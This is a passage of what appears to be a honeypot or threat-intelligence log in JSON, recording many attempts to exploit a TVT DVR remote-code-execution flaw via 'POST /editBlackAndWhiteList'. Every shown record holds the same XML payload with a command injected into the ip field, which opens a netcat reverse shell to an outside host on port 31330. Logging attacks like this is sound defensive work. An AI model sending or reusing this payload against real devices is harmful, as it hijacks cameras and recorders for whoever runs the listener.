- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T06:06:03Z",
- "last_seen": "2019-12-21T06:06:03Z"
- },
- {
- "source_ip_address": "65.33.66.202",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T05:49:17Z",
- "last_seen": "2019-12-21T05:49:17Z"
- },
- {
- "source_ip_address": "187.243.54.213",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T05:47:34Z",
- "last_seen": "2019-12-21T05:47:34Z"
- },
- {
- "source_ip_address": "175.215.234.245",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-21T05:46:18Z",
- "last_seen": "2019-12-21T05:46:18Z"
- },
- {
- "source_ip_address": "91.146.133.172",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T05:25:35Z",
- "last_seen": "2019-12-21T05:25:35Z"
- },
- {
- "source_ip_address": "116.48.140.149",
- "country": "HK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 377,
- "first_seen": "2019-12-19T02:01:23Z",
- "last_seen": "2019-12-21T05:22:12Z"
- },
- {
- "source_ip_address": "77.247.28.151",
- "country": "UA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T04:52:47Z",
- "last_seen": "2019-12-21T04:52:47Z"
- },
- {
- "source_ip_address": "187.202.130.8",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T04:50:26Z",
- "last_seen": "2019-12-21T04:50:26Z"
- },
- {
- "source_ip_address": "73.57.137.100",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T04:48:27Z",
- "last_seen": "2019-12-21T04:48:27Z"
- },
- {
- "source_ip_address": "89.165.204.71",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-21T04:38:43Z",
- "last_seen": "2019-12-21T04:38:43Z"
- },
- {
- "source_ip_address": "123.195.84.191",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T04:33:21Z",
- "last_seen": "2019-12-21T04:33:21Z"
- },
- {
- "source_ip_address": "185.8.25.172",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-20T20:03:36Z",
- "last_seen": "2019-12-21T03:44:24Z"
- },
- {
- "source_ip_address": "197.44.101.210",
- "country": "EG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 120,
- "first_seen": "2019-12-21T03:31:36Z",
- "last_seen": "2019-12-21T03:31:36Z"
- },
- {
- "source_ip_address": "189.130.46.121",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T03:28:06Z",
- "last_seen": "2019-12-21T03:28:06Z"
- },
- {
- "source_ip_address": "111.185.231.71",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T02:32:19Z",
- "last_seen": "2019-12-21T02:32:19Z"
- },
- {
- "source_ip_address": "5.2.143.125",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-21T02:15:07Z",
- "last_seen": "2019-12-21T02:15:07Z"
- },
- {
- "source_ip_address": "187.87.247.182",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T02:06:00Z",
- "last_seen": "2019-12-21T02:06:00Z"
- },
- {
- "source_ip_address": "75.183.184.112",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-21T01:57:25Z",
- "last_seen": "2019-12-21T01:57:25Z"
- },
- {
- "source_ip_address": "58.115.167.142",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-21T01:56:05Z",
- "last_seen": "2019-12-21T01:56:05Z"
- },
- {
- "source_ip_address": "151.250.242.181",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 121,
- "first_seen": "2019-12-21T01:50:59Z",
- "last_seen": "2019-12-21T01:50:59Z"
- },
- {
- "source_ip_address": "220.135.136.169",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T01:50:58Z",
- "last_seen": "2019-12-21T01:50:58Z"
- },
- {
- "source_ip_address": "36.227.116.199",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T01:41:34Z",
- "last_seen": "2019-12-21T01:41:34Z"
- },
- {
- "source_ip_address": "73.180.196.167",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-21T01:02:25Z",
- "last_seen": "2019-12-21T01:02:25Z"
- },
- {
- "source_ip_address": "2.238.177.94",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-21T00:58:04Z",
- "last_seen": "2019-12-21T00:58:04Z"
- },
- {
- "source_ip_address": "175.144.150.26",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 12,
- "first_seen": "2019-12-21T00:48:21Z",
- "last_seen": "2019-12-21T00:48:21Z"
- },
- {
- "source_ip_address": "91.146.133.172",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 129,
- "first_seen": "2019-12-21T00:39:38Z",
- "last_seen": "2019-12-21T00:39:38Z"
- },
- {
- "source_ip_address": "175.140.235.130",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-21T00:38:47Z",
- "last_seen": "2019-12-21T00:38:47Z"
- },
- {
- "source_ip_address": "151.24.17.0",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
